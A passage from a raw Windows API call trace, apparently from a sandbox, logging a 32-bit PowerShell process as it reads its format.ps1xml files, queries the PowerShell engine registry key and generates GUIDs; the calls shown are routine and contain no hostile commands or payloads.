lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2f3afa4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.171] GetLastError () returned 0x0 [0145.172] ReadFile (in: hFile=0x34c, lpBuffer=0x2f3afa4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2f3afa4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.172] GetLastError () returned 0x0 [0145.173] ReadFile (in: hFile=0x34c, lpBuffer=0x2f3afa4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2f3afa4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.173] GetLastError () returned 0x0 [0145.173] ReadFile (in: hFile=0x34c, lpBuffer=0x2f3afa4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2f3afa4*, lpNumberOfBytesRead=0x2de734*=0xbce, lpOverlapped=0x0) returned 1 [0145.174] GetLastError () returned 0x0 [0145.174] ReadFile (in: hFile=0x34c, lpBuffer=0x2f3a712, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2f3a712*, lpNumberOfBytesRead=0x2de734*=0x0, lpOverlapped=0x0) returned 1 [0145.174] GetLastError () returned 0x0 [0145.174] ReadFile (in: hFile=0x34c, lpBuffer=0x2f3afa4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2f3afa4*, lpNumberOfBytesRead=0x2de734*=0x0, lpOverlapped=0x0) returned 1 [0145.174] GetLastError () returned 0x0 [0145.174] CloseHandle (hObject=0x34c) returned 1 [0145.174] GetLastError () returned 0x0 [0145.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de294, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0145.174] GetLastError () returned 0x0 [0145.174] SetErrorMode (uMode=0x1) returned 0x1 [0145.174] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2f5bfa0 | out: lpFileInformation=0x2f5bfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0145.174] GetLastError () returned 0x0 [0145.174] SetErrorMode (uMode=0x1) returned 0x1 [0145.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0145.174] GetLastError () returned 0x0 [0145.174] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de6b8 | out: phkResult=0x2de6b8*=0x34c) returned 0x0 [0145.175] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2de700, lpData=0x0, lpcbData=0x2de6fc*=0x0 | out: lpType=0x2de700*=0x1, lpData=0x0, lpcbData=0x2de6fc*=0x56) returned 0x0 [0145.175] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2de700, lpData=0x3da558, lpcbData=0x2de6fc*=0x56 | out: lpType=0x2de700*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2de6fc*=0x56) returned 0x0 [0145.175] RegCloseKey (hKey=0x34c) returned 0x0 [0145.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0145.175] GetLastError () returned 0x0 [0145.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de1f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0145.175] GetLastError () returned 0x0 [0145.176] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x3e176c58, Data2=0x3205, Data3=0x4637, Data4=([0]=0x97, [1]=0x69, [2]=0x40, [3]=0xf0, [4]=0x8e, [5]=0x2d, [6]=0xc8, [7]=0xfa))) returned 0x0 [0145.176] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x1d4208a5, Data2=0xd3a1, Data3=0x407b, Data4=([0]=0x9a, [1]=0x92, [2]=0xf2, [3]=0x8e, [4]=0x90, [5]=0xd4, [6]=0x84, [7]=0x71))) returned 0x0 [0145.176] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xf4238136, Data2=0x76cf, Data3=0x45fb, Data4=([0]=0xb1, [1]=0xda, [2]=0x3a, [3]=0xd5, [4]=0x1e, [5]=0x2a, [6]=0x21, [7]=0x60))) returned 0x0 [0145.176] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x9b8afcc8, Data2=0x1d1e, Data3=0x488a, Data4=([0]=0x8b, [1]=0x66, [2]=0x99, [3]=0xce, [4]=0x9a, [5]=0x33, [6]=0xdc, [7]=0xe3))) returned 0x0 [0145.176] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xfadd7e27, Data2=0xb52d, Data3=0x44ec, Data4=([0]=0xb7, [1]=0x1e, [2]=0x7e, [3]=0xc4, [4]=0x68, [5]=0x1d, [6]=0xa9, [7]=0xc8))) returned 0x0 [0145.176] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xa57f6f84, Data2=0x8b0a, Data3=0x4852, Data4=([0]=0x94, [1]=0x68, [2]=0xd7, [3]=0x8e, [4]=0x68, [5]=0xab, [6]=0x10, [7]=0xb))) returned 0x0 [0145.176] VirtualQuery (in: lpAddress=0x2dd460, lpBuffer=0x2de460, dwLength=0x1c | out: lpBuffer=0x2de460*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.177] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xb465d096, Data2=0xd3b8, Data3=0x4c6c, Data4=([0]=0x91, [1]=0xce, [2]=0x9f, [3]=0xd9, [4]=0xd4, [5]=0xd7, [6]=0x40, [7]=0x5f))) returned 0x0 [0145.177] VirtualQuery (in: lpAddress=0x2dd460, lpBuffer=0x2de460, dwLength=0x1c | out: lpBuffer=0x2de460*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.177] VirtualQuery (in: lpAddress=0x2dd460, lpBuffer=0x2de460, dwLength=0x1c | out: lpBuffer=0x2de460*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.177] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x5d645fb0, Data2=0x8bdf, Data3=0x42f4, Data4=([0]=0x8c, [1]=0xc0, [2]=0xc2, [3]=0xf5, [4]=0x7e, [5]=0xa2, [6]=0xee, [7]=0xed))) returned 0x0 [0145.177] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x5a088069, Data2=0x13d4, Data3=0x4cfd, Data4=([0]=0x98, [1]=0x8b, [2]=0xe6, [3]=0xe7, [4]=0xbd, [5]=0x3, [6]=0x76, [7]=0x42))) returned 0x0 [0145.177] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x8b3135cb, Data2=0x8a26, Data3=0x4ae6, Data4=([0]=0x84, [1]=0xa8, [2]=0x2f, [3]=0x2f, [4]=0x86, [5]=0xfc, [6]=0x1, [7]=0xc1))) returned 0x0 [0145.177] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x4384143f, Data2=0xfbf1, Data3=0x47b5, Data4=([0]=0xa7, [1]=0xa, [2]=0x89, [3]=0xb3, [4]=0xbf, [5]=0xaa, [6]=0x85, [7]=0xe9))) returned 0x0 [0145.177] VirtualQuery (in: lpAddress=0x2dd460, lpBuffer=0x2de460, dwLength=0x1c | out: lpBuffer=0x2de460*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.177] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x51aa3920, Data2=0x3c07, Data3=0x49ec, Data4=([0]=0x9d, [1]=0x7e, [2]=0x2f, [3]=0x74, [4]=0x49, [5]=0xa9, [6]=0xa5, [7]=0xf3))) returned 0x0 [0145.178] VirtualQuery (in: lpAddress=0x2dd460, lpBuffer=0x2de460, dwLength=0x1c | out: lpBuffer=0x2de460*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.178] VirtualQuery (in: lpAddress=0x2dd460, lpBuffer=0x2de460, dwLength=0x1c | out: lpBuffer=0x2de460*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.178] VirtualQuery (in: lpAddress=0x2dd460, lpBuffer=0x2de460, dwLength=0x1c | out: lpBuffer=0x2de460*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.178] VirtualQuery (in: lpAddress=0x2dd460, lpBuffer=0x2de460, dwLength=0x1c | out: lpBuffer=0x2de460*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.179] VirtualQuery (in: lpAddress=0x2dd460, lpBuffer=0x2de460, dwLength=0x1c | out: lpBuffer=0x2de460*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.179] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x89f73adc, Data2=0xb981, Data3=0x4cad, Data4=([0]=0x9c, [1]=0x1b, [2]=0xfa, [3]=0x35, [4]=0x77, [5]=0xe5, [6]=0xcf, [7]=0x3f))) returned 0x0 [0145.179] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x994eb230, Data2=0x9652, Data3=0x4e84, Data4=([0]=0xa8, [1]=0x44, [2]=0x95, [3]=0xc1, [4]=0x23, [5]=0x59, [6]=0x3c, [7]=0xed))) returned 0x0 [0145.179] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xbf7f8f37, Data2=0xd40e, Data3=0x4af2, Data4=([0]=0x82, [1]=0x75, [2]=0x59, [3]=0xd6, [4]=0xba, [5]=0x6e, [6]=0x5, [7]=0x6))) returned 0x0 [0145.179] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x4a7c8f9c, Data2=0x460, Data3=0x4bc3, Data4=([0]=0x87, [1]=0x1e, [2]=0xf4, [3]=0xfb, [4]=0xe1, [5]=0x2d, [6]=0x9f, [7]=0x63))) returned 0x0 [0145.179] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x518d4698, Data2=0x870e, Data3=0x4861, Data4=([0]=0x8f, [1]=0x27, [2]=0x1c, [3]=0xe5, [4]=0x2b, [5]=0x25, [6]=0x1b, [7]=0x6c))) returned 0x0 [0145.179] VirtualQuery (in: lpAddress=0x2dd5b4, lpBuffer=0x2de5b4, dwLength=0x1c | out: lpBuffer=0x2de5b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.179] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xfc5be418, Data2=0x6459, Data3=0x4c62, Data4=([0]=0xa8, [1]=0xde, [2]=0x50, [3]=0xa6, [4]=0x3a, [5]=0x80, [6]=0x56, [7]=0x7a))) returned 0x0 [0145.180] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x1b6c60a0, Data2=0xa08f, Data3=0x4471, Data4=([0]=0xa9, [1]=0x6c, [2]=0xcb, [3]=0x94, [4]=0xf2, [5]=0x72, [6]=0x8d, [7]=0xc2))) returned 0x0 [0145.180] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x41f13aed, Data2=0x4500, Data3=0x455d, Data4=([0]=0xab, [1]=0x5a, [2]=0xa4, [3]=0x75, [4]=0x64, [5]=0xba, [6]=0x4e, [7]=0x46))) returned 0x0 [0145.180] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x2ab11f5a, Data2=0xfbda, Data3=0x4f00, Data4=([0]=0x8e, [1]=0x8d, [2]=0x21, [3]=0xab, [4]=0x89, [5]=0x7f, [6]=0x87, [7]=0x5e))) returned 0x0 [0145.180] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x6ee234e1, Data2=0x635b, Data3=0x46c9, Data4=([0]=0x9b, [1]=0x71, [2]=0x29, [3]=0xf5, [4]=0x47, [5]=0xff, [6]=0xb5, [7]=0x9))) returned 0x0 [0145.180] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x6318edf3, Data2=0x8428, Data3=0x4424, Data4=([0]=0xa1, [1]=0xc8, [2]=0xb5, [3]=0xe, [4]=0xf6, [5]=0x8d, [6]=0xa3, [7]=0x9f))) returned 0x0 [0145.180] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xda9dd526, Data2=0x7520, Data3=0x4a17, Data4=([0]=0xb3, [1]=0x26, [2]=0xb8, [3]=0x57, [4]=0x57, [5]=0x18, [6]=0x8e, [7]=0x5c))) returned 0x0 [0145.180] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xe35df495, Data2=0xfea8, Data3=0x4c17, Data4=([0]=0xad, [1]=0x1f, [2]=0x8f, [3]=0x5e, [4]=0x74, [5]=0x59, [6]=0x71, [7]=0x4f))) returned 0x0 [0145.180] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xa8ca76f7, Data2=0x3fc7, Data3=0x4843, Data4=([0]=0x80, [1]=0x75, [2]=0x11, [3]=0x6a, [4]=0xba, [5]=0xef, [6]=0x3a, [7]=0x85))) returned 0x0 [0145.180] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x57982e37, Data2=0x3d5d, Data3=0x4a42, Data4=([0]=0xbd, [1]=0xd1, [2]=0xca, [3]=0x24, [4]=0x90, [5]=0xce, [6]=0xd5, [7]=0xe2))) returned 0x0 [0145.180] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xe9f66a9, Data2=0x3530, Data3=0x451d, Data4=([0]=0xbc, [1]=0xbf, [2]=0xed, [3]=0x35, [4]=0x64, [5]=0x56, [6]=0xc5, [7]=0x7f))) returned 0x0 [0145.181] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x659985ab, Data2=0x949d, Data3=0x4375, Data4=([0]=0xb8, [1]=0xc4, [2]=0x84, [3]=0x66, [4]=0x61, [5]=0xff, [6]=0x74, [7]=0xac))) returned 0x0 [0145.181] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xc397f677, Data2=0xb68d, Data3=0x4c4a, Data4=([0]=0xb5, [1]=0xb6, [2]=0x7d, [3]=0x95, [4]=0x84, [5]=0xa2, [6]=0x54, [7]=0xd8))) returned 0x0 [0145.181] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x81b672f9, Data2=0x6c27, Data3=0x4c2e, Data4=([0]=0xbb, [1]=0x92, [2]=0xbb, [3]=0xcd, [4]=0xd6, [5]=0x41, [6]=0x23, [7]=0xc1))) returned 0x0 [0145.181] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x1c73b54f, Data2=0x3a2c, Data3=0x4fb5, Data4=([0]=0x96, [1]=0xa8, [2]=0xb8, [3]=0x65, [4]=0x43, [5]=0x89, [6]=0x9b, [7]=0x31))) returned 0x0 [0145.181] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x291a54a8, Data2=0x236f, Data3=0x491f, Data4=([0]=0xb5, [1]=0x83, [2]=0x47, [3]=0xd7, [4]=0xbe, [5]=0xf6, [6]=0xb6, [7]=0x90))) returned 0x0 [0145.181] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x68c141c, Data2=0x80fc, Data3=0x43ab, Data4=([0]=0x93, [1]=0xfa, [2]=0x88, [3]=0x65, [4]=0x65, [5]=0x1a, [6]=0x5, [7]=0x20))) returned 0x0 [0145.181] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x4bd3613, Data2=0x26c5, Data3=0x4783, Data4=([0]=0xa9, [1]=0x2c, [2]=0x30, [3]=0x53, [4]=0x3b, [5]=0x83, [6]=0x9f, [7]=0x2b))) returned 0x0 [0145.181] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x643be24e, Data2=0xf60, Data3=0x49bd, Data4=([0]=0xa0, [1]=0x2, [2]=0x8c, [3]=0xfd, [4]=0x5b, [5]=0xa, [6]=0x66, [7]=0x75))) returned 0x0 [0145.181] VirtualQuery (in: lpAddress=0x2dd460, lpBuffer=0x2de460, dwLength=0x1c | out: lpBuffer=0x2de460*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.181] VirtualQuery (in: lpAddress=0x2dd460, lpBuffer=0x2de460, dwLength=0x1c | out: lpBuffer=0x2de460*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.183] VirtualQuery (in: lpAddress=0x2dd460, lpBuffer=0x2de460, dwLength=0x1c | out: lpBuffer=0x2de460*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.233] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x5377eb3, Data2=0x882d, Data3=0x4cc7, Data4=([0]=0xb2, [1]=0xfc, [2]=0xc7, [3]=0x6b, [4]=0x2b, [5]=0x51, [6]=0x61, [7]=0xc4))) returned 0x0 [0145.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de1cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0145.233] GetLastError () returned 0x0 [0145.233] SetErrorMode (uMode=0x1) returned 0x1 [0145.233] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c [0145.233] GetLastError () returned 0x0 [0145.233] GetFileType (hFile=0x34c) returned 0x1 [0145.233] SetErrorMode (uMode=0x1) returned 0x1 [0145.234] GetFileType (hFile=0x34c) returned 0x1 [0145.234] ReadFile (in: hFile=0x34c, lpBuffer=0x2ff8e8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2ff8e8c*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.234] GetLastError () returned 0x0 [0145.234] ReadFile (in: hFile=0x34c, lpBuffer=0x2ff8e8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2ff8e8c*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.234] GetLastError () returned 0x0 [0145.234] ReadFile (in: hFile=0x34c, lpBuffer=0x2ff8e8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2ff8e8c*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.234] GetLastError () returned 0x0 [0145.234] ReadFile (in: hFile=0x34c, lpBuffer=0x2ff8e8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2ff8e8c*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.234] GetLastError () returned 0x0 [0145.234] ReadFile (in: hFile=0x34c, lpBuffer=0x2ff8e8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2ff8e8c*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.234] GetLastError () returned 0x0 [0145.234] ReadFile (in: hFile=0x34c, lpBuffer=0x2ff8e8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2ff8e8c*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.234] GetLastError () returned 0x0 [0145.234] ReadFile (in: hFile=0x34c, lpBuffer=0x2ff8e8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2ff8e8c*, lpNumberOfBytesRead=0x2de734*=0x119, lpOverlapped=0x0) returned 1 [0145.234] GetLastError () returned 0x0 [0145.234] ReadFile (in: hFile=0x34c, lpBuffer=0x2ff8e8c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2ff8e8c*, lpNumberOfBytesRead=0x2de734*=0x0, lpOverlapped=0x0) returned 1 [0145.234] GetLastError () returned 0x0 [0145.235] CloseHandle (hObject=0x34c) returned 1 [0145.235] GetLastError () returned 0x0 [0145.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de294, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0145.235] GetLastError () returned 0x0 [0145.235] SetErrorMode (uMode=0x1) returned 0x1 [0145.235] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x3019e88 | out: lpFileInformation=0x3019e88*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0145.235] GetLastError () returned 0x0 [0145.235] SetErrorMode (uMode=0x1) returned 0x1 [0145.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0145.235] GetLastError () returned 0x0 [0145.235] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de6b8 | out: phkResult=0x2de6b8*=0x34c) returned 0x0 [0145.235] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2de700, lpData=0x0, lpcbData=0x2de6fc*=0x0 | out: lpType=0x2de700*=0x1, lpData=0x0, lpcbData=0x2de6fc*=0x56) returned 0x0 [0145.235] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2de700, lpData=0x3da558, lpcbData=0x2de6fc*=0x56 | out: lpType=0x2de700*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2de6fc*=0x56) returned 0x0 [0145.236] RegCloseKey (hKey=0x34c) returned 0x0 [0145.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0145.236] GetLastError () returned 0x0 [0145.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de1f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0145.236] GetLastError () returned 0x0 [0145.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.236] GetLastError () returned 0x0 [0145.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.236] GetLastError () returned 0x0 [0145.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.236] GetLastError () returned 0x0 [0145.236] VirtualQuery (in: lpAddress=0x2dd410, lpBuffer=0x2de410, dwLength=0x1c | out: lpBuffer=0x2de410*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.237] CoCreateGuid (in: pguid=0x2de728 | out: 